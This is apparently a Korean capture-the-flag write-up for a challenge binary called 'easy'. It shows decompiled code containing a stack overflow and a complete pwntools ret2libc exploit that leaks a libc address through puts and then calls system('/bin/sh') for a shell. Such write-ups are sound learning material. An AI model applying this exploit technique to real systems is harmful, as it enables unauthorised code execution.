Easy 어쩌고문제 서호진이줌

LeeDoHyun · May 9, 2020

엄청 쉬운문제 인데 이상한데서 막혀서 삽질했습니다.

ssize_t sub_400A76()
{
  __int64 buf; // [rsp+0h] [rbp-10h]
  __int64 v2; // [rsp+8h] [rbp-8h]

  if ( memcmp(s1, &unk_602100, 0x20uLL) )
    exit(-1);
  buf = 0LL;
  v2 = 0LL;
  write(1, "> ", 2uLL);
  return read(0, &buf, 0x38uLL);                // overflow
}

대충. 취약점이 터지는함수

너무 간단해서 조건만 맞춰주면 풀리는 문제입니다.

#!/usr/bin/env python2
#-*-coding:utf8-*-

from pwn import *

#context.log_level = 'debug'
r = process('./easy')
e = ELF('./easy')
libc = e.libc

puts_plt = e.plt['puts']
puts_got = e.got['puts']
main = 0x400ADD

pop_rdi = 0x400BE3
r.sendlineafter('>', str(1))
r.sendlineafter('>', 'a'*0x20)

r.sendlineafter('>', str(3))
r.sendlineafter('>', 'a'*0x40)

r.sendlineafter('>', str(4919))
payload = 'a'*(0x10 + 0x8)
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendline(payload)

leak = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00')
base = leak - libc.symbols['puts']
system = base + libc.symbols['system']
binsh = base + libc.search('/bin/sh').next()

log.success('leak addr : {}'.format(hex(leak)))
log.success('base addr : {}'.format(hex(base)))
log.success('system addr : {}'.format(hex(system)))
log.success('binsh addr : {}'.format(hex(binsh)))

r.sendlineafter('>', str(3))
r.sendlineafter('>', 'a'*0x40)

r.sendlineafter('>', str(4919))
payload = 'a'*(0x10 + 0x8)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
r.sendline(payload)
r.interactive()

Twitter, Facebook